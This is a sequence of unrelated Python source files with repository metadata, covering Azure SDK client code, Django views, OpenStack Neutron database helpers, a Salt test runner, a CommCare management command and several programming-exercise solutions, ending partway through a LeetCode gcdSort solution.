# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Optional, TypeVar
import urllib.parse
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import (
ClientAuthenticationError,
HttpResponseError,
ResourceExistsError,
ResourceNotFoundError,
ResourceNotModifiedError,
map_error,
)
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.utils import case_insensitive_dict
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._backup_protection_containers_operations import build_list_request
from .._vendor import RecoveryServicesBackupClientMixinABC
T = TypeVar("T")
# Signature of the optional ``cls`` callback callers may pass to an operation:
# (raw pipeline response, deserialized body, response headers) -> Any.
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class BackupProtectionContainersOperations:
    """Async operations for listing backup protection containers.

    .. warning::
        **DO NOT** instantiate this class directly.
        Instead, you should access the following operations through
        :class:`~azure.mgmt.recoveryservicesbackup.activestamp.aio.RecoveryServicesBackupClient`'s
        :attr:`backup_protection_containers` attribute.
    """
    models = _models
    def __init__(self, *args, **kwargs) -> None:
        # Accepts (client, config, serializer, deserializer) either positionally
        # or as keyword arguments; positional values win when both are given.
        input_args = list(args)
        self._client = input_args.pop(0) if input_args else kwargs.pop("client")
        self._config = input_args.pop(0) if input_args else kwargs.pop("config")
        self._serialize = input_args.pop(0) if input_args else kwargs.pop("serializer")
        self._deserialize = input_args.pop(0) if input_args else kwargs.pop("deserializer")
    @distributed_trace
    def list(
        self, vault_name: str, resource_group_name: str, filter: Optional[str] = None, **kwargs: Any
    ) -> AsyncIterable["_models.ProtectionContainerResource"]:
        """Lists the containers registered to Recovery Services Vault.

        :param vault_name: The name of the recovery services vault. Required.
        :type vault_name: str
        :param resource_group_name: The name of the resource group where the recovery services vault is
         present. Required.
        :type resource_group_name: str
        :param filter: OData filter options. Default value is None.
        :type filter: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ProtectionContainerResource or the result of
         cls(response)
        :rtype:
         ~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.recoveryservicesbackup.activestamp.models.ProtectionContainerResource]
        :raises ~azure.core.exceptions.HttpResponseError:
        """
        _headers = kwargs.pop("headers", {}) or {}
        _params = case_insensitive_dict(kwargs.pop("params", {}) or {})
        # Explicit api_version kwarg > query param > client default.
        api_version: str = kwargs.pop("api_version", _params.pop("api-version", self._config.api_version))
        cls: ClsType[_models.ProtectionContainerResourceList] = kwargs.pop("cls", None)
        # Map well-known status codes to specific azure-core exception types;
        # anything else falls through to the generic HttpResponseError below.
        error_map = {
            401: ClientAuthenticationError,
            404: ResourceNotFoundError,
            409: ResourceExistsError,
            304: ResourceNotModifiedError,
        }
        error_map.update(kwargs.pop("error_map", {}) or {})
        def prepare_request(next_link=None):
            # First page: build the request from operation metadata.
            # Subsequent pages: follow the service-provided next_link verbatim,
            # re-injecting the client's api-version into its query string.
            if not next_link:
                request = build_list_request(
                    vault_name=vault_name,
                    resource_group_name=resource_group_name,
                    subscription_id=self._config.subscription_id,
                    filter=filter,
                    api_version=api_version,
                    template_url=self.list.metadata["url"],
                    headers=_headers,
                    params=_params,
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
            else:
                # make call to next link with the client's api-version
                _parsed_next_link = urllib.parse.urlparse(next_link)
                _next_request_params = case_insensitive_dict(
                    {
                        key: [urllib.parse.quote(v) for v in value]
                        for key, value in urllib.parse.parse_qs(_parsed_next_link.query).items()
                    }
                )
                _next_request_params["api-version"] = self._config.api_version
                request = HttpRequest(
                    "GET", urllib.parse.urljoin(next_link, _parsed_next_link.path), params=_next_request_params
                )
                request = _convert_request(request)
                request.url = self._client.format_url(request.url)
                request.method = "GET"
            return request
        async def extract_data(pipeline_response):
            # Deserialize one page; return (link to next page or None,
            # async iterator over this page's elements).
            deserialized = self._deserialize("ProtectionContainerResourceList", pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)  # type: ignore
            return deserialized.next_link or None, AsyncList(list_of_elem)
        async def get_next(next_link=None):
            # Fetch a single page and fail fast on any non-200 response.
            request = prepare_request(next_link)
            _stream = False
            pipeline_response: PipelineResponse = await self._client._pipeline.run(  # pylint: disable=protected-access
                request, stream=_stream, **kwargs
            )
            response = pipeline_response.http_response
            if response.status_code not in [200]:
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, error_format=ARMErrorFormat)
            return pipeline_response
        return AsyncItemPaged(get_next, extract_data)
    list.metadata = {
        "url": "/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.RecoveryServices/vaults/{vaultName}/backupProtectionContainers"
    }
| [
"noreply@github.com"
] | Azure.noreply@github.com |
f13aa73d31a2841260ea3b48e0adb7200deb0fda | d8fe3b5243bec2b61fd7907c4ff799b24bb617e5 | /Bloomberg_codecon/General_challenger_problems/mug_color.py | 65d046ed2e35e926aa298629faa04dc9adabde17 | [
"Unlicense"
] | permissive | SelvorWhim/competitive | b89ed252512d88d9346d168dc6b48e0a42a6142d | 1c73a5c7b2d0dc1b6c4f3f06ace69cdf5c6a34c0 | refs/heads/master | 2023-04-13T01:02:52.083519 | 2023-04-11T10:14:38 | 2023-04-11T10:14:38 | 96,573,533 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,927 | py | ### INSTRUCTIONS ###
'''
Jay S. has got himself in trouble! He had borrowed a friend's coffee mug and somehow lost it. As his friend will be extremely angry when he finds out about it, Jay has decided to buy his friend a replacement mug to try to control the damage.
Unfortunately, Jay does not remember the color of the mug he had borrowed. He only knows that the color was one of White, Black, Blue, Red or Yellow.
Jay goes around his office asking his colleagues if they are able to recall the color but his friends don't seem to remember the color of the mug either. What they do know is what color the mug definitely was not.
Based on this information, help Jay figure out what the color of the mug was.
> Input Specifications
Your program will take
An input N (1 <= N <= 1,000,000) which denotes the number of people Jay questions regarding the mug.
This will be followed by N strings S[1],S[2]...S[N] where S[I] denotes the response of person I to Jay's question which is what color the mug definitely was not. S[I] will also be only one of the 5 colors namely White, Black, Blue, Red or Yellow.
> Output Specifications
Based on the input, print out the color of the mug. The color of the mug can only be one of the 5 colors namely White, Black, Blue, Red or Yellow.
You can safely assume that there always exists only one unique color that the mug can have.
'''
### MY SOLUTION (accepted) ###
#Problem : Mug Color
#Language : Python 3
#Compiled Using : py_compile
#Version : Python 3.4.3
#Input for your program will be provided from STDIN
#Print out all output from your program to STDOUT
import sys

# Candidate colours; each response eliminates a colour the mug was NOT.
colors = ['White', 'Black', 'Blue', 'Red', 'Yellow']
data = sys.stdin.read().splitlines()
N = int(data[0])
# Consider exactly the N recorded responses (data[1:] would also sweep up any
# stray trailing lines in the input).
for color in data[1:N + 1]:
    if color in colors:
        colors.remove(color)
print(colors[0])  # the problem guarantees exactly one colour remains
"Carmeverre@gmail.com"
] | Carmeverre@gmail.com |
3d53fe5bfcc78cbe0f91bd04f98035197e584aa3 | d7ccb4225f623139995a7039f0981e89bf6365a4 | /.history/store/views_20211011174414.py | b3aa780e17766d12a299e017068f39c7ef8a9c6c | [] | no_license | tonnymuchui/django-mall | 64fd4abc3725c1bd0a3dcf20b93b490fe9307b37 | 55c083d8433be3c77adc61939cd197902de4ce76 | refs/heads/master | 2023-08-23T04:59:20.418732 | 2021-10-13T15:59:37 | 2021-10-13T15:59:37 | 415,668,388 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,356 | py | from django.shortcuts import get_object_or_404, render
from store.models import Product
from category.models import Category
from carts.views import _cart_id
from carts.models import CartItem
from django.core.paginator import EmptyPage, PageNotAnInteger, Paginator
# Create your views here.
def store(request, category_slug=None):
    """Render the product catalogue, optionally filtered by category.

    :param request: the incoming HttpRequest.
    :param category_slug: optional category slug; when given, only available
        products of that category are listed (404 if the slug is unknown).
    :returns: rendered ``store/store.html`` response.
    """
    if category_slug is not None:
        categories = get_object_or_404(Category, slug=category_slug)
        products = Product.objects.filter(category=categories, is_available=True)
    else:
        products = Product.objects.filter(is_available=True)
    # Count once after the branch instead of duplicating it per branch.
    products_count = products.count()
    content = {
        'products': products,
        'products_count': products_count,
    }
    return render(request, 'store/store.html', content)
def product_detail(request, category_slug, product_slug):
    """Render a single product's detail page.

    :param request: the incoming HttpRequest.
    :param category_slug: slug of the product's category.
    :param product_slug: slug of the product itself.
    :returns: rendered ``store/product_detail.html`` response.
    :raises Product.DoesNotExist: when the slug pair matches no product
        (the original ``except Exception as e: raise e`` was a no-op that
        only obscured the traceback, so the exception now propagates directly).
    """
    single_product = Product.objects.get(category__slug=category_slug, slug=product_slug)
    # True when this product is already in the current session's cart.
    in_cart = CartItem.objects.filter(cart__cart_id=_cart_id(request), product=single_product).exists()
    content = {
        'single_product': single_product,
        'in_cart': in_cart,
    }
    return render(request, 'store/product_detail.html', content)
"tonykanyingah@gmail.com"
] | tonykanyingah@gmail.com |
37170c7468eb730c386bcbb10eae65fbcf0897c5 | b8a13ecb7c0999954807e80c7470d8f752a3653b | /LearnPythonTheHardWay/Python3/ex13-more.py | 6ebf367feb72eaf15feceea90b4b64c2e17c6b07 | [] | no_license | jbarcia/Python-Books | 59ca3d7b7fb1f2c1e3d1659f846032382af557a9 | 2106a2e5f56cdd4261bf870798a0a427d6137249 | refs/heads/master | 2021-01-19T00:24:59.727307 | 2017-01-05T00:07:13 | 2017-01-05T00:07:13 | 62,562,390 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 355 | py | #!/bin/python3
# ex13: Parameters, Unpacking, Variables
# Write a script that has more arguments.
from sys import argv

# Unpack the five expected command-line values into named variables.
script, name, age, height, weight = argv

# Echo each value back; height and weight are printed as whole numbers.
print(f"The script is called: {script}")
print(f"Your name is: {name}")
print(f"Your age is: {age}")
print(f"Your height is {int(height)} inches")
print(f"Your weight is {int(weight)} pounds")
| [
"jbarcia99@yahoo.com"
] | jbarcia99@yahoo.com |
2672ebf95d24a74fd6bfb9c7ca5948697ef1cc80 | b3fa4bb31add76bbff0b6f864f433ff9af7897b6 | /109.sortedListToBST.py | 751ed76c2ec1801eb87a6f002d30123f3f262fbb | [] | no_license | Aissen-Li/LeetCode | 7298225ba95d58194a5fc87c7ee3ef4d04ec4d4b | f08628e3ce639d1e3f35a2bd3af14cc2b67d7249 | refs/heads/master | 2020-12-30T08:03:17.277924 | 2020-09-25T08:20:53 | 2020-09-25T08:20:53 | 238,919,619 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 834 | py | # Definition for singly-linked list.
class ListNode:
    """Singly-linked list node (LeetCode definition)."""
    def __init__(self, x):
        self.val = x
        self.next = None


class TreeNode:
    """Binary tree node (LeetCode definition)."""
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None


class Solution:
    def sortedListToBST(self, head: ListNode) -> TreeNode:
        """Convert a sorted singly linked list into a height-balanced BST.

        The middle node (found with slow/fast pointers) becomes the root;
        the two halves are converted recursively.

        Fix: the original had no base case for an empty list, so any
        recursion that produced an empty sublist (every even-length list)
        crashed with ``AttributeError`` on ``slow.val``.
        """
        if head is None:
            return None
        slow, fast = head, head
        leftEnd = None  # node just before the middle, used to cut the left half
        while fast and fast.next:
            leftEnd = slow
            slow = slow.next
            fast = fast.next.next
        if head == slow:
            # Single-node list: it is its own (leaf) subtree.
            return TreeNode(slow.val)
        root = TreeNode(slow.val)
        if leftEnd:
            leftEnd.next = None  # detach the left half from the middle
        rightStart = slow.next
        root.left = self.sortedListToBST(head)
        root.right = self.sortedListToBST(rightStart)
        return root
"aissen_f@163.com"
] | aissen_f@163.com |
adf993aa0cb6b57623219bbff2eea82c09956c47 | dddbfd8eb6dff0bd3449bac87ee76b5c3e0bdfb1 | /icehouse-patches/neutron/vlan2vlan/neutron/db/cascade_db.py | d3e520ea4be1bb85b014269fd52aa828589bc05c | [
"Apache-2.0"
] | permissive | joey5678/tricircle | 40897fed8fe9d6772e8878b4f06ba1a829636488 | e211f7efef129bbfb038cc05232ea1de33f82a97 | refs/heads/master | 2021-01-17T21:04:32.945469 | 2014-11-17T09:46:29 | 2014-11-17T10:10:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,542 | py | '''
Created on 2014-8-5
@author: j00209498
'''
from oslo.db import exception as db_exc
import sqlalchemy as sa
from neutron.api.rpc.agentnotifiers import l3_rpc_agent_api
from neutron.common import exceptions as q_exc
from neutron.common import log
from neutron.common import utils
from neutron.db import model_base
from neutron.extensions import dvr as ext_dvr
from neutron import manager
from neutron.openstack.common import log as logging
from oslo.config import cfg
from sqlalchemy.orm import exc
LOG = logging.getLogger(__name__)
# VXLAN VNI range reserved for cross-pod ("big 2 layer") networks, given as
# "<low>:<high>" and parsed (inclusively) by CascadeDBMixin.is_big2layer_vni().
big2layer_vni_opts = [
    cfg.StrOpt('big2layer_vni_range',
               default="4097:20000",
               help=_('The big 2 layer vxlan vni range used for '
                      'CascadeDBMixin instances by Neutron')),
]
cfg.CONF.register_opts(big2layer_vni_opts)
class CascadeAZNetworkBinding(model_base.BASEV2):
    """Binds a network to the availability-zone host it was scheduled to.

    (The previous docstring, copied from the DVR MAC model, was incorrect.)
    """
    __tablename__ = 'cascade_az_network_bind'
    network_id = sa.Column(sa.String(36), primary_key=True, nullable=False)
    host = sa.Column(sa.String(255), primary_key=True, nullable=False)
class CascadeRouterAZExternipMapping(model_base.BASEV2):
    """Maps a (router, availability-zone host) pair to its external IP.

    (The previous docstring, copied from the DVR MAC model, was incorrect.)
    """
    __tablename__ = 'cascade_router_az_externip_map'
    router_id = sa.Column(sa.String(36), primary_key=True, nullable=False)
    host = sa.Column(sa.String(255), primary_key=True, nullable=False)
    extern_ip = sa.Column(sa.String(64), nullable=False)
class CascadeDBMixin(object):
    """DB helpers for cascade (cross-pod) state: AZ/network bindings and
    per-AZ router external-IP mappings."""
    @property
    def l3_rpc_notifier(self):
        # Lazily create and cache the L3 agent notifier on first use.
        if not hasattr(self, '_l3_rpc_notifier'):
            self._l3_rpc_notifier = l3_rpc_agent_api.L3AgentNotifyAPI()
        return self._l3_rpc_notifier
    def is_big2layer_vni(self, seg_id):
        """Return True when seg_id falls inside the configured
        'big2layer_vni_range' ("<low>:<high>", inclusive on both ends)."""
        vni = cfg.CONF.big2layer_vni_range.split(':')
        if(seg_id >= int(vni[0]) and seg_id <= int(vni[1])):
            return True
        else:
            return False
    def get_binding_az_by_network_id(self, context, net_id):
        """Return the AZ host bound to net_id, or None when unbound."""
        try:
            query = context.session.query(CascadeAZNetworkBinding)
            ban = query.filter(
                CascadeAZNetworkBinding.network_id == net_id).one()
        except exc.NoResultFound:
            return None
        return ban['host']
    def add_binding_az_network_id(self, context, binding_host, net_id):
        """Persist a network->AZ-host binding; duplicates are logged and ignored."""
        try:
            with context.session.begin(subtransactions=True):
                dvr_mac_binding = CascadeAZNetworkBinding(
                    network_id=net_id, host=binding_host)
                context.session.add(dvr_mac_binding)
                LOG.debug("add az_host %(host)s for network %(network_id)s ",
                          {'host': binding_host, 'network_id': net_id})
        except db_exc.DBDuplicateEntry:
            # Binding already present; treat as a no-op.
            LOG.debug("az_host %(host)s exists for network %(network_id)s,"
                      " DBDuplicateEntry error.",
                      {'host': binding_host, 'network_id': net_id})
    def get_extern_ip_by_router_id_and_host(self, context, router_id, host):
        """Return the external IP mapped to (router_id, host), or None."""
        rae = self.get_router_az_extern_ip_mapping(context, router_id, host)
        if(rae):
            return rae['extern_ip']
        return None
#        try:
#            query = context.session.query(CascadeRouterAZExternipMapping)
#            erh = query.filter(
#                CascadeRouterAZExternipMapping.router_id == router_id,
#                CascadeRouterAZExternipMapping.host == host).one()
#        except exc.NoResultFound:
#            return None
#        return erh['extern_ip']
    def get_router_az_extern_ip_mapping(self, context, router_id, host):
        """Return the mapping row for (router_id, host), or None."""
        try:
            query = context.session.query(CascadeRouterAZExternipMapping)
            erh = query.filter(
                CascadeRouterAZExternipMapping.router_id == router_id,
                CascadeRouterAZExternipMapping.host == host).one()
        except exc.NoResultFound:
            return None
        return erh
    def update_router_az_extern_ip_mapping(self, context, router_id,
                                           host, extern_ip):
        """Create, update, or (when extern_ip is None) delete the mapping,
        notifying L3 agents about the router on every path."""
        if extern_ip is None:
            # None acts as a delete request.
            self.del_router_az_extern_ip_mapping(context, router_id, host)
            self.l3_rpc_notifier.routers_updated(context, [router_id],
                                                 None, None)
            return
        rae = self.get_router_az_extern_ip_mapping(context, router_id, host)
        if(rae and rae['extern_ip'] != extern_ip):
            # Existing row with a different IP: update it in place.
            update_rae = {}
            update_rae['router_id'] = rae['router_id']
            update_rae['host'] = rae['host']
            update_rae['extern_ip'] = extern_ip
            rae.update(update_rae)
            LOG.debug("update extern_ip %(extern_ip)s for az_host %(host)s "
                      "and router %(router_id)s ",
                      {'extern_ip': extern_ip,
                       'host': host,
                       'network_id': router_id})
            self.l3_rpc_notifier.routers_updated(context, [router_id],
                                                 None, None)
            return
        # No row (or same IP): attempt an insert; a duplicate insert (same IP
        # already stored) is logged and ignored.
        try:
            with context.session.begin(subtransactions=True):
                router_az_extern_ip_map = CascadeRouterAZExternipMapping(
                    router_id=router_id, host=host, extern_ip=extern_ip)
                context.session.add(router_az_extern_ip_map)
                LOG.debug("add extern_ip %(extern_ip)s for az_host %(host)s "
                          "and router %(router_id)s ",
                          {'extern_ip': extern_ip,
                           'host': host,
                           'network_id': router_id})
                self.l3_rpc_notifier.routers_updated(context, [router_id],
                                                     None, None)
        except db_exc.DBDuplicateEntry:
            LOG.debug("DBDuplicateEntry ERR:update extern_ip %(extern_ip)s "
                      "for az_host %(host)s and router %(router_id)s ",
                      {'extern_ip': extern_ip,
                       'host': host,
                       'network_id': router_id})
    def del_router_az_extern_ip_mapping(self, context, router_id, host):
        """Delete the mapping for (router_id, host) if present.

        NOTE(review): bulk Query.delete() does not raise NoResultFound, so
        the except clause looks unreachable — confirm before relying on it.
        """
        try:
            query = context.session.query(CascadeRouterAZExternipMapping)
            query.filter(
                CascadeRouterAZExternipMapping.router_id == router_id,
                CascadeRouterAZExternipMapping.host == host).delete()
        except exc.NoResultFound:
            return None
| [
"joehuang@huawei.com"
] | joehuang@huawei.com |
ca537def844347b897bbf7d508e7ed1b36881424 | 5d6fa3466d9fa8bd6719c6dea586163d3d089090 | /codes/CHAPTER_3/Chapter_3.5_Error_Handling/Lesson_3/3.5.3_TryExcept2.py | 7dddad2dacf6be45dfd851d778977a7fca8af2a4 | [] | no_license | harveylabis/GTx_CS1301 | cff0c1a076b1da73c66d53175330b4dedc244163 | f26a5e9c4b8c29acb831444cd59d21524267825c | refs/heads/master | 2023-06-26T14:44:38.976288 | 2021-08-02T04:20:31 | 2021-08-02T04:20:31 | 269,361,753 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 597 | py | mystery_value = 9
#You may modify the lines of code above, but don't move them!
#When you Submit your code, we'll change these lines to
#assign different values to the variables.
#Create a program that divides 10 by mystery_value and prints
#the result. In the case that mystery_value is equal to 0,
#print "Not possible". Do not catch any other errors. This
#means there will be an uncaught error in the correct answer!
#
#You may not use any conditionals or the type() function.
#Add your code here!
# Attempt the division; only a zero divisor is treated as a handled case,
# any other error (e.g. a non-numeric mystery_value) propagates uncaught.
try:
    quotient = 10 / mystery_value
except ZeroDivisionError:
    print("Not possible")
else:
    print(quotient)
| [
"harveyabiagador@gmail.com"
] | harveyabiagador@gmail.com |
9077243272380d510bf5f7fc9d920155d1ce0b61 | 239c34e56a2b586ae6618c1ccbba7e668a28fc6d | /salt/runners/error.py | 9bffab178e87891343acebb2e20fbfef0018b68f | [
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] | permissive | georgiou/salt | 076ce8e62289910af960f8e45ab8c3e0131943f2 | 4a3b930e4f2a8bfcdd9d18c3fef9cb1eb806a3f5 | refs/heads/develop | 2023-09-03T10:39:01.309513 | 2014-03-07T15:49:29 | 2014-03-07T15:49:29 | 17,520,119 | 0 | 0 | NOASSERTION | 2023-09-06T17:29:01 | 2014-03-07T16:32:38 | Python | UTF-8 | Python | false | false | 616 | py | # -*- coding: utf-8 -*-
'''
Error generator to enable integration testing of salt runner error handling
'''
# Import python libs
# Import salt libs
import salt.utils.error
def error(name=None, message=''):
    '''
    Return an empty dict when no *name* is given; otherwise raise an
    exception whose ``__name__`` comes from *name* and whose message
    comes from *message*.

    CLI Example:

    .. code-block:: bash

        salt-run error
        salt-run error.error name="Exception" message="This is an error."
    '''
    if name is None:
        return {}
    salt.utils.error.raise_error(name=name, message=message)
    return {}
| [
"smith.samuel.m@gmail.com"
] | smith.samuel.m@gmail.com |
c0413f4a1638ff5d986ce54f0cb09762125edb75 | c5b9c54492cdf591a2190364e7bfb1041b63c218 | /Selenium_pratice/PRATICE.py | 0aa9ed5795198786069df71cfd606f54389195ae | [] | no_license | QAvinod/Interview_Question_Examples | 43f7fb46f497415a8b30a8c6c5f13d2cbf6055b4 | f4f6d2c4e4fcc536de5656db30021f416959cce8 | refs/heads/master | 2023-06-13T04:18:12.218130 | 2021-07-06T10:29:10 | 2021-07-06T10:29:10 | 331,185,419 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 488 | py | from selenium import webdriver
from webdriver_manager.chrome import ChromeDriverManager
from selenium.webdriver.chrome.service import Service
def xpath_types():
    """Open a maximized Chrome session and load amazon.in (practice script)."""
    a = 1
    # Resolve a chromedriver binary via webdriver_manager; install() presumably
    # downloads it on first run — TODO confirm.
    service = Service(executable_path=ChromeDriverManager().install())
    opt = webdriver.ChromeOptions()
    opt.add_argument("--start-maximized")
    driver = webdriver.Chrome(service=service, options=opt)
    driver.get('https://www.amazon.in/')
    # Placeholder assertion; note the browser is never closed (no driver.quit()).
    assert a == 1
# Run the practice scenario only when executed directly, not on import.
if __name__ == '__main__':
    xpath_types()
| [
"Vinod-E"
] | Vinod-E |
a38cbb263b8e8f152f0c49822ead89c1c46ab177 | 551ef0567aca428a535775d3949f5d9670c0d29c | /arc/arc003/b/main.py | a12ea26e888cccfd2ec1bc149e4cebdf993c7f4b | [] | no_license | komo-fr/AtCoder | 7451a9402466ce8d487d0c521128732061c647df | c916889294cb12f21e74254de43b3e17e1b354bc | refs/heads/master | 2023-07-22T07:05:52.955188 | 2023-03-01T14:22:16 | 2023-03-01T14:22:16 | 213,109,943 | 0 | 0 | null | 2023-07-06T22:01:28 | 2019-10-06T04:44:49 | Python | UTF-8 | Python | false | false | 201 | py | #!/usr/bin/env python3
N = int(input().split()[0])
s_list = []
for _ in range(N):
s = input()
s = s[::-1]
s_list.append(s)
ans = "\n".join([s[::-1] for s in sorted(s_list)])
print(ans)
| [
"komo.mdrms@gmail.com"
] | komo.mdrms@gmail.com |
7367eeebaef104b7ba3efa04c721a5f60349632d | 7c15f211adc9e9eb9f66ccdd570c9f38dff7ea8d | /packages/autorest.python/test/vanilla/legacy/Expected/AcceptanceTests/ClientEnum/clientenum/_vendor.py | 3b000a3b496306b693b088034c588b9e6b4b3a76 | [
"LicenseRef-scancode-generic-cla",
"MIT"
] | permissive | Azure/autorest.python | cc4bfbf91ae11535731cad37cedd6b733edf1ebd | a00d7aaa3753ef05cb5a0d38c664a90869478d44 | refs/heads/main | 2023-09-03T06:58:44.246200 | 2023-08-31T20:11:51 | 2023-08-31T20:11:51 | 100,315,955 | 47 | 40 | MIT | 2023-09-14T21:00:21 | 2017-08-14T22:58:33 | Python | UTF-8 | Python | false | false | 1,302 | py | # --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from abc import ABC
from typing import TYPE_CHECKING
from azure.core.pipeline.transport import HttpRequest
from ._configuration import ClientWithEnumConfiguration
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from azure.core import PipelineClient
from ._serialization import Deserializer, Serializer
def _convert_request(request, files=None):
data = request.content if not files else None
request = HttpRequest(method=request.method, url=request.url, headers=request.headers, data=data)
if files:
request.set_formdata_body(files)
return request
class ClientWithEnumMixinABC(ABC):
"""DO NOT use this class. It is for internal typing use only."""
_client: "PipelineClient"
_config: ClientWithEnumConfiguration
_serialize: "Serializer"
_deserialize: "Deserializer"
| [
"noreply@github.com"
] | Azure.noreply@github.com |
ee35ec61d28c96933eeefced4425bbb07e904ab5 | c27862cc24513c1d1c221e07c261b9fe65a37f54 | /logging_moudle/A_test.py | 50b540b5b19a23cdb07ccb383f965a24b6193b9c | [] | no_license | MannixZ/Mannix | ac62ef29c1dcbb513b121ad9d42db851103884fc | 7b86d0a619e0d6e3eecb94331ee60d89542b99f2 | refs/heads/master | 2020-05-26T13:27:24.979334 | 2019-05-23T14:10:47 | 2019-05-23T14:10:47 | 164,109,199 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
from logging_moudle.main import setup_logging
# logger = logging.getLogger('main.A_test')
def compler():
    """Log a marker line (via the root logger) when the first constant
    exceeds the second — which, with 3 > 2, is always."""
    first, second = 3, 2
    if first > second:
        logging.info("++++++%s %s", first, second)
def hahaha():
    """Emit a fixed separator line to the root logger."""
    logging.info('__________')
if __name__ == '__main__':
    # Configure logging handlers first so the INFO records below are emitted.
    setup_logging()
    compler()
hahaha() | [
"noreply@github.com"
] | MannixZ.noreply@github.com |
13f6ebcb96f77e6bd120053c29a06acd5afdee72 | f513c794fd95cb72ee776029ece38a08c4b4da0b | /corehq/apps/cleanup/management/commands/reprocess_error_forms.py | efe1b59229228cce7b52b8ed4af54578c3020968 | [] | no_license | bglar/commcare-hq | a92f034a0c2faf787da8321b4d79e55f098bd89f | 972129fc26864c08c7bef07874bd2a7218550bff | refs/heads/master | 2021-05-28T20:44:12.876151 | 2015-01-16T16:23:52 | 2015-01-16T16:23:52 | 29,391,363 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,217 | py | from collections import defaultdict
from django.core.management.base import BaseCommand, CommandError, LabelCommand
from casexml.apps.case.util import reprocess_form_cases
from corehq.apps.cleanup.xforms import iter_problem_forms
from optparse import make_option
from dimagi.utils.parsing import string_to_datetime
class Command(BaseCommand):
    # Management command (Python 2 era): re-runs case processing for forms
    # tagged as errors. Usage: <domain> [since]; --dryrun only prints IDs.
    args = '<domain> <since>'
    help = ('Reprocesses all documents tagged as errors and tries to '
            'regenerate the appropriate case blocks for them. Can pass in '
            'a domain and date to process forms received after that date or '
            'just a domain to process all problem forms in the domain.')
    option_list = LabelCommand.option_list + \
        (make_option('--dryrun', action='store_true', dest='dryrun', default=False,
                     help="Don't do the actual reprocessing, just print the ids that would be affected"),)
    def handle(self, *args, **options):
        """Parse positional args, iterate problem forms, reprocess each
        (unless --dryrun) and print a success/failure summary."""
        domain = since = None
        if len(args) == 1:
            domain = args[0]
        elif len(args) == 2:
            domain = args[0]
            since = string_to_datetime(args[1])
        else:
            raise CommandError('Usage: %s\n%s' % (self.args, self.help))
        succeeded = []
        failed = []
        # Tally of occurrences per distinct error message.
        error_messages = defaultdict(lambda: 0)
        for form in iter_problem_forms(domain, since):
            # One tab-separated diagnostic line per problem form.
            print "%s\t%s\t%s\t%s\t%s" % (form._id, form.received_on,
                                          form.xmlns,
                                          form.xpath('form/meta/username'),
                                          form.problem.strip())
            if not options["dryrun"]:
                try:
                    reprocess_form_cases(form)
                except Exception, e:
                    failed.append(form._id)
                    error_messages[str(e)] += 1
                else:
                    succeeded.append(form._id)
        print "%s / %s forms successfully processed, %s failures" % \
            (len(succeeded), len(succeeded) + len(failed), len(failed))
        if error_messages:
            print "The following errors were seen: \n%s" % \
                ("\n".join("%s: %s" % (v, k) for k, v in error_messages.items()))
| [
"droberts@dimagi.com"
] | droberts@dimagi.com |
ed04c0cece483566e3d392dbc7e8b59f228424c2 | bd37e10ba5aa2e241c82c0f707e832e2d2c98448 | /delivery_app/administrators/apps.py | 41d1adfdf06d8d58d39eb0047eb6dcb2c11de41e | [] | no_license | DmitriyBul/DimkaDeliveryApp | 9d88aaf733fee5345fe1ff0ca4a83242b3ca73c4 | 22fe0229bbd17e978bdc279751e41c98584a0e44 | refs/heads/main | 2023-08-23T16:34:42.470321 | 2021-11-05T07:06:40 | 2021-11-05T07:06:40 | 402,777,939 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 160 | py | from django.apps import AppConfig
class AdministratorsConfig(AppConfig):
    """Django app configuration for the ``administrators`` app."""
    # 64-bit auto-incrementing primary keys by default (Django 3.2+).
    default_auto_field = 'django.db.models.BigAutoField'
    name = 'administrators'
| [
"128dmitriy128@gmail.com"
] | 128dmitriy128@gmail.com |
96b7f757a6988a25b6d5ad78d76e2389fa42424d | bfe6c95fa8a2aae3c3998bd59555583fed72900a | /gcdSort.py | 97870c2ccb58fb7d3bff9a961af1faed1095b64f | [] | no_license | zzz136454872/leetcode | f9534016388a1ba010599f4771c08a55748694b2 | b5ea6c21bff317884bdb3d7e873aa159b8c30215 | refs/heads/master | 2023-09-01T17:26:57.624117 | 2023-08-29T03:18:56 | 2023-08-29T03:18:56 | 240,464,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,658 | py | from typing import List
class Solution:
    def gcdSort(self, nums: List[int]) -> bool:
        """Return True if nums can be sorted by repeatedly swapping pairs
        whose gcd exceeds 1 (LeetCode 1998).

